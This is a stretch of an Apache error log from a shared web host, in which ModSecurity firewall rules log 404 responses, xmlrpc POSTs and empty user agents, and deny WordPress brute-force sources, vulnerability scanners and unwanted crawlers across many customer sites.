[Tue May 26 17:06:46.360302 2026] [security2:error] [pid 851641:tid 851786] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFzRp8QSN2510avp49CQAAAA8"]
[Tue May 26 17:06:47.027086 2026] [security2:error] [pid 851641:tid 851874] [client 78.190.43.26:16412] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-admin/admin-post.php"] [unique_id "ahWFzhp8QSN2510avp49EwAAZyg"], referer: https://www.cagmedya.com/wp-admin/edit.php?post_type=page
[Tue May 26 17:06:47.974569 2026] [security2:error] [pid 851641:tid 851805] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFzxp8QSN2510avp49LQAAACI"]
[Tue May 26 17:06:50.532292 2026] [security2:error] [pid 851641:tid 851883] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF0hp8QSN2510avp49bAAAAHA"]
[Tue May 26 17:06:51.056156 2026] [security2:error] [pid 851641:tid 851700] [remote 84.247.129.9:49826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWF0hp8QSN2510avp49fAAAOzo"]
[Tue May 26 17:06:51.635248 2026] [security2:error] [pid 851641:tid 851800] [client 103.174.5.177:33253] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWF0hp8QSN2510avp49fQAAAB0"]
[Tue May 26 17:06:52.696101 2026] [security2:error] [pid 851641:tid 851824] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF1Bp8QSN2510avp49owAAADU"]
[Tue May 26 17:06:54.963009 2026] [security2:error] [pid 851641:tid 851888] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF1hp8QSN2510avp495wAAAHU"]
[Tue May 26 17:06:54.974566 2026] [security2:error] [pid 851641:tid 851786] [client 203.194.101.7:52845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWF1hp8QSN2510avp496AAAAA8"]
[Tue May 26 17:06:54.974763 2026] [security2:error] [pid 851641:tid 851786] [client 203.194.101.7:52845] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWF1hp8QSN2510avp496AAAAA8"]
[Tue May 26 17:06:57.592341 2026] [security2:error] [pid 851641:tid 851701] [remote 195.250.23.247:33916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWF2Rp8QSN2510avp4-JgAAFDs"]
[Tue May 26 17:06:57.940546 2026] [security2:error] [pid 851641:tid 851810] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF2Rp8QSN2510avp4-LAAAACc"]
[Tue May 26 17:06:58.466392 2026] [security2:error] [pid 851641:tid 851705] [remote 69.49.112.72:43442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.112.49.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWF2hp8QSN2510avp4-QAAATT8"]
[Tue May 26 17:06:58.563957 2026] [security2:error] [pid 851641:tid 851837] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF2hp8QSN2510avp4-PwAAAEI"]
[Tue May 26 17:07:00.846103 2026] [security2:error] [pid 851641:tid 851883] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF3Bp8QSN2510avp4-dAAAAHA"]
[Tue May 26 17:07:01.701807 2026] [security2:error] [pid 851641:tid 851781] [client 185.191.171.19:46146] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahWF3Rp8QSN2510avp4-igAAAAo"]
[Tue May 26 17:07:01.701948 2026] [security2:error] [pid 851641:tid 851781] [client 185.191.171.19:46146] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahWF3Rp8QSN2510avp4-igAAAAo"]
[Tue May 26 17:07:02.602058 2026] [security2:error] [pid 851641:tid 851708] [remote 5.250.187.247:55798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWF3hp8QSN2510avp4-mAAAZkI"]
[Tue May 26 17:07:02.917488 2026] [security2:error] [pid 851641:tid 851730] [remote 124.156.212.23:3879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWF3hp8QSN2510avp4-pQAAOVg"]
[Tue May 26 17:07:02.935978 2026] [security2:error] [pid 851641:tid 851867] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF3hp8QSN2510avp4-mwAAAGA"]
[Tue May 26 17:07:05.279212 2026] [security2:error] [pid 851641:tid 851820] [client 203.194.101.7:53215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWF4Rp8QSN2510avp4-3QAAADE"]
[Tue May 26 17:07:05.279381 2026] [security2:error] [pid 851641:tid 851820] [client 203.194.101.7:53215] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWF4Rp8QSN2510avp4-3QAAADE"]
[Tue May 26 17:07:06.707839 2026] [security2:error] [pid 851641:tid 851825] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF4hp8QSN2510avp4-9gAAADY"]
[Tue May 26 17:07:07.806371 2026] [security2:error] [pid 851641:tid 851870] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF4xp8QSN2510avp4_EQAAAGM"]
[Tue May 26 17:07:07.870536 2026] [security2:error] [pid 851641:tid 851877] [client 72.14.95.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWF4xp8QSN2510avp4_HgAAAGo"], referer: https://www.anujtradingco.com/
[Tue May 26 17:07:09.150874 2026] [security2:error] [pid 851641:tid 851823] [client 72.14.95.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWF5Rp8QSN2510avp4_SAAAADQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1507871&moderation-hash=f76559aea9a31bc2ff43d272cbf831bb
[Tue May 26 17:07:09.670794 2026] [security2:error] [pid 851641:tid 851853] [client 74.7.175.187:42800] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ramaenterprises.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWF5Rp8QSN2510avp4_eQAAUkg"]
[Tue May 26 17:07:09.871576 2026] [security2:error] [pid 851641:tid 851814] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF5Rp8QSN2510avp4_WAAAACs"]
[Tue May 26 17:07:11.375943 2026] [security2:error] [pid 851641:tid 851888] [client 113.186.93.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF5hp8QSN2510avp4_swAAAHU"]
[Tue May 26 17:07:11.974677 2026] [security2:error] [pid 851641:tid 851852] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF5xp8QSN2510avp4_3QAAAFE"]
[Tue May 26 17:07:12.861703 2026] [security2:error] [pid 851641:tid 851840] [client 62.244.225.226:35167] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWF6Bp8QSN2510avp5AAwAAAEU"]
[Tue May 26 17:07:14.243774 2026] [security2:error] [pid 851641:tid 851794] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF6Rp8QSN2510avp5AJwAAABc"]
[Tue May 26 17:07:15.785243 2026] [security2:error] [pid 851641:tid 851828] [client 203.194.101.7:53549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWF6xp8QSN2510avp5AdAAAADk"]
[Tue May 26 17:07:15.785404 2026] [security2:error] [pid 851641:tid 851828] [client 203.194.101.7:53549] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWF6xp8QSN2510avp5AdAAAADk"]
[Tue May 26 17:07:16.587058 2026] [security2:error] [pid 851641:tid 851891] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF7Bp8QSN2510avp5AhwAAAHg"]
[Tue May 26 17:07:16.624355 2026] [security2:error] [pid 851641:tid 851784] [client 74.7.230.27:49894] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "valodico.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWF7Bp8QSN2510avp5AkwAADXk"]
[Tue May 26 17:07:18.505359 2026] [security2:error] [pid 851641:tid 851781] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF7hp8QSN2510avp5A2gAAAAo"]
[Tue May 26 17:07:20.671233 2026] [security2:error] [pid 851641:tid 851797] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF8Bp8QSN2510avp5BHgAAABo"]
[Tue May 26 17:07:21.764828 2026] [security2:error] [pid 851641:tid 851880] [client 103.174.5.177:34173] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWF8Bp8QSN2510avp5BMQAAAG0"]
[Tue May 26 17:07:22.253225 2026] [proxy:warn] [pid 851641:tid 851866] [client 45.33.109.18:34454] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 17:07:22.699838 2026] [security2:error] [pid 851641:tid 851818] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF8hp8QSN2510avp5BUAAAAC8"]
[Tue May 26 17:07:22.782587 2026] [security2:error] [pid 851641:tid 851792] [client 45.33.109.18:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWF8hp8QSN2510avp5BTwAAABU"]
[Tue May 26 17:07:22.783158 2026] [security2:error] [pid 851641:tid 851866] [client 45.33.109.18:34454] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/400.shtml"] [unique_id "ahWF8hp8QSN2510avp5BSwAAAF8"]
[Tue May 26 17:07:23.360217 2026] [security2:error] [pid 851641:tid 851679] [remote 165.22.95.96:35266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWF8xp8QSN2510avp5BZgAAOCU"]
[Tue May 26 17:07:24.995494 2026] [security2:error] [pid 851641:tid 851869] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF9Bp8QSN2510avp5BmQAAAGI"]
[Tue May 26 17:07:26.287678 2026] [security2:error] [pid 851641:tid 851788] [client 203.194.101.7:53884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWF9hp8QSN2510avp5BvgAAABE"]
[Tue May 26 17:07:26.287878 2026] [security2:error] [pid 851641:tid 851788] [client 203.194.101.7:53884] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWF9hp8QSN2510avp5BvgAAABE"]
[Tue May 26 17:07:26.625207 2026] [security2:error] [pid 851641:tid 851780] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF9hp8QSN2510avp5BwQAAAAk"]
[Tue May 26 17:07:29.127135 2026] [security2:error] [pid 851641:tid 851837] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF-Bp8QSN2510avp5B-QAAAEI"]
[Tue May 26 17:07:31.598508 2026] [security2:error] [pid 851641:tid 851775] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF-xp8QSN2510avp5CIAAAAAQ"]
[Tue May 26 17:07:33.053648 2026] [security2:error] [pid 851641:tid 851813] [client 104.234.53.162:60675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 162.53.234.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWF_Bp8QSN2510avp5CQAAAACo"], referer: https://www.facebook.com/
[Tue May 26 17:07:34.199015 2026] [security2:error] [pid 851641:tid 851894] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF_Rp8QSN2510avp5CWAAAAHs"]
[Tue May 26 17:07:35.323296 2026] [security2:error] [pid 851641:tid 851882] [client 194.116.236.215:39556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-enquiry.php"] [unique_id "ahWF_xp8QSN2510avp5CcwAAAG8"]
[Tue May 26 17:07:35.751702 2026] [security2:error] [pid 851641:tid 851845] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF_xp8QSN2510avp5CfQAAAEo"]
[Tue May 26 17:07:35.845847 2026] [security2:error] [pid 851641:tid 851751] [remote 103.91.67.202:53330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWF_xp8QSN2510avp5CjAAAO20"]
[Tue May 26 17:07:35.892603 2026] [security2:error] [pid 851641:tid 851797] [client 194.116.236.215:55544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-enquiry.php"] [unique_id "ahWF_xp8QSN2510avp5CkAAAABo"]
[Tue May 26 17:07:36.088650 2026] [security2:error] [pid 851641:tid 851776] [client 194.116.236.215:39560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-enquiry.php"] [unique_id "ahWGABp8QSN2510avp5CnQAAAAU"]
[Tue May 26 17:07:36.163217 2026] [security2:error] [pid 851641:tid 851801] [client 14.160.219.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWF_xp8QSN2510avp5CjwAAAB4"]
[Tue May 26 17:07:36.215845 2026] [security2:error] [pid 851641:tid 851781] [client 104.234.53.158:62401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.53.234.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWF_xp8QSN2510avp5CkQAAAAo"], referer: https://www.google.com/
[Tue May 26 17:07:36.504070 2026] [security2:error] [pid 851641:tid 851881] [client 194.116.236.215:55548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-enquiry.php"] [unique_id "ahWGABp8QSN2510avp5CpgAAAG4"]
[Tue May 26 17:07:36.581862 2026] [security2:error] [pid 851641:tid 851820] [client 203.194.101.7:54218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGABp8QSN2510avp5CpwAAADE"]
[Tue May 26 17:07:36.581990 2026] [security2:error] [pid 851641:tid 851820] [client 203.194.101.7:54218] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGABp8QSN2510avp5CpwAAADE"]
[Tue May 26 17:07:36.849756 2026] [security2:error] [pid 851641:tid 851857] [client 194.116.236.215:39564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-contact.php"] [unique_id "ahWGABp8QSN2510avp5CsQAAAFY"]
[Tue May 26 17:07:37.306015 2026] [security2:error] [pid 851641:tid 851843] [client 194.116.236.215:39572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-contact.php"] [unique_id "ahWGARp8QSN2510avp5CvgAAAEg"]
[Tue May 26 17:07:37.447519 2026] [security2:error] [pid 851641:tid 851836] [client 194.116.236.215:55560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-contact.php"] [unique_id "ahWGARp8QSN2510avp5CwwAAAEE"]
[Tue May 26 17:07:37.711419 2026] [security2:error] [pid 851641:tid 851855] [client 194.116.236.215:55576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-contact.php"] [unique_id "ahWGARp8QSN2510avp5CyQAAAFQ"]
